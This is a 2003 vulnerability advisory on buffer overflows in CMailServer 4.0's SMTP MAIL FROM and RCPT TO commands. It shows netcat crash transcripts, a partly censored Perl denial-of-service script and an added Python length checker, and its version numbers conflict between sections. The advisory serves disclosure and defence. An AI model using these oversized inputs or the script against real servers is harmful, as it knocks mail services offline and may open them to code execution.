Dennis Rand
10/05/03, 19:50
Multiple Buffer Overflow Vulnerabilities
Found in CMailServer 4.0
http://www.youngzsoft.com
Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------
-----[SUMMARY
CMailServer, a small and easy-to-administer email server and web mail
server software, can help you build your own email server for
Win NT/2000/XP. It enables you to send and receive email across the
Internet or within your LAN. ESMTP authentication, ASP form web mail
and multiple domain names are supported.
CMailServer offers an unlimited email users license at a reasonable
and affordable price compared to other email server software.
For small to medium sized companies, CMailServer will be an economic
and effective solution to handle their e-mail management requirements.
CMailServer is also a web mail server and provides full web mail
service. The web mail is based on ASP. You can customize your web mail
interface freely. Give it a try and find out how easy it is to build an
email server and web mail server for your own business.
The problem is a buffer overflow in the command handling of the
ESMTP CMailServer 4.0.2002.11.24 SMTP Service, which causes the service
to shut down. It is also possible to overwrite the exception handler on
the stack, allowing a system compromise with code execution running as
SYSTEM.
-----[AFFECTED SYSTEMS
Vulnerable systems:
* ESMTP CMailServer 4.0.2003.03.27 SMTP Service
Immune systems:
* ESMTP CMailServer 4.0.2003.03.30 SMTP Service
-----[SEVERITY
High - An attacker is able to cause a denial of service against the SMTP
service, and can overwrite the exception handler on the stack, allowing
a system compromise with code execution running as SYSTEM.
-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The vulnerability is a buffer overflow in the ESMTP CMailServer
4.0.2002.11.24 SMTP Service. When a malicious attacker sends an
oversized argument in the "MAIL FROM" or "RCPT TO" command, the buffer
overflows. With carefully crafted input, attackers could execute
arbitrary commands with system privileges.
The following transcript demonstrates a sample exploitation of the
vulnerabilities:
----------------------------- [Transcript] -----------------------------
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<Connection closed>
The same vulnerability exists in RCPT TO:
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<connection closed>
----------------------------- [Transcript] -----------------------------
----------------------------- [Exploit Code] -----------------------------
#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP CMailServer, causing the service to shutdown.
# It is then where we can actually overwrite the exception handler on the
# stack allowing a system compromise with code execution running as SYSTEM.
#
#
# I've censored some of the source code out. =)
#
# Solution:
# None at this time
#
#
use IO::Socket;

# Target host (first argument) and SMTP port
my $target = shift() || "warlab.dk";
my $port = 25;
# Oversized MAIL FROM argument; the length is censored in the original
my $Buffer = "A" x <CENSORED>;
my $sock = IO::Socket::INET->new(
    PeerAddr => $target,
    PeerPort => $port,
    Proto    => 'tcp'
) || die "could not connect: $!";
# Read the greeting banner and require a 2xx reply before continuing
my $banner = <$sock>;
if ($banner !~ /^2.*/) {
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}
print $sock "HELO $target\r\n";
my $resp = <$sock>;
print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
$resp = <$sock>;
print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";
close($sock);
----------------------------- [Exploit Code] -----------------------------
-----[DETECTION
ESMTP CMailServer 4.0.2003.03.27 SMTP Service is vulnerable to the
above-described attacks. Earlier versions may be susceptible as well.
To determine whether a specific installation is vulnerable, follow the
above transcript against a test system.
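As an added, defensive example that is not part of the original advisory: a small Python check that flags MAIL FROM / RCPT TO command lines whose argument exceeds the RFC 2821 length limits, which is both the bound a server should enforce on these commands and a simple rule for inspecting captured SMTP sessions. The sample session and the example.invalid addresses are constructed.

```python
import re

# RFC 2821 section 4.5.3.1 size limits: a reverse-path or forward-path
# (including angle brackets) and a whole command line (including CRLF).
MAX_PATH_LEN = 256
MAX_COMMAND_LINE = 512

# Tolerates the spacing seen in the advisory's transcript ("Mail From : ...")
CMD_RE = re.compile(r"^\s*(MAIL\s+FROM|RCPT\s+TO)\s*:\s*(.*?)\s*$", re.IGNORECASE)


def check_smtp_command(line):
    """Classify one client command line.

    Returns (command, reason): command is 'MAIL FROM', 'RCPT TO' or None for
    any other command; reason is None when the line is within limits.
    """
    stripped = line.rstrip("\r\n")
    m = CMD_RE.match(stripped)
    if not m:
        return None, None
    cmd = re.sub(r"\s+", " ", m.group(1)).upper()
    arg = m.group(2)
    wire_len = len(stripped) + 2  # add the CRLF the client sends
    if wire_len > MAX_COMMAND_LINE:
        return cmd, "command line %d bytes exceeds %d" % (wire_len, MAX_COMMAND_LINE)
    if len(arg) > MAX_PATH_LEN:
        return cmd, "path %d bytes exceeds %d" % (len(arg), MAX_PATH_LEN)
    return cmd, None


def scan_session(lines):
    """Return (line number, command, reason) for every oversized MAIL FROM / RCPT TO."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        cmd, reason = check_smtp_command(line)
        if cmd and reason:
            findings.append((lineno, cmd, reason))
    return findings


# Constructed client side of a session shaped like the advisory's transcript
SAMPLE_SESSION = [
    "HELO Foobar",
    "MAIL FROM: admin@example.invalid",
    "RCPT TO: <" + "a" * 2000 + "@example.invalid>",
    "DATA",
]

if __name__ == "__main__":
    for lineno, cmd, reason in scan_session(SAMPLE_SESSION):
        print("line %d: oversized %s (%s)" % (lineno, cmd, reason))
```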
-----[WORK AROUNDS
Upgrade as soon as possible to ESMTP CMailServer 4.0.2003.03.30 SMTP
Service or later.
The other workaround is to disable the SMTP service, but that is not fun.
-----[VENDOR RESPONSE
Quoting YoungZSoft <yaoer@youngzsoft.com>:
I thank you very very much for your report.
We will fix this as soon as possible.
Yaoer
-----[DISCLOSURE TIMELINE
24/04/2003 Found the Vulnerability, and made an analysis.
29/04/2003 Contacted Vendor at support@youngzsoft.net
30/04/2003 Received response from vendor with a fix to test
01/05/2003 New version tested negative for the vulnerabilities
10/05/2003 Public Disclosure.
-----[ADDITIONAL INFORMATION
The vulnerability was discovered and reported by Dennis Rand
<der@infowarfare.dk>.
-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of
any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.